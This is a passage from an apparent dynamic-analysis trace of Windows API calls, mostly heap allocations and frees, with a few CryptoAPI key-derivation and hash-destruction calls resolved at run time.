lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aaacd8 [0176.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaacd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0176.724] CryptDeriveKey (in: hProv=0xa7c2a8, Algid=0x6601, hBaseData=0x9e20f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0176.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0176.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0176.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0176.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0176.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0176.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0176.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0176.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0176.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0176.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0176.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaae0 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8e8 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab28 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8b8 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0176.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa08 [0176.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa38 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad68 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae10 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab58 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0176.759] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0176.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaade0 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0176.759] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0176.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0176.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.759] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0176.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0176.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0176.760] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0176.760] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0176.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0176.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0176.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0176.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0176.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0176.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0176.762] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0176.762] CryptDestroyHash (hHash=0x9e20f8) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0176.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0176.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, 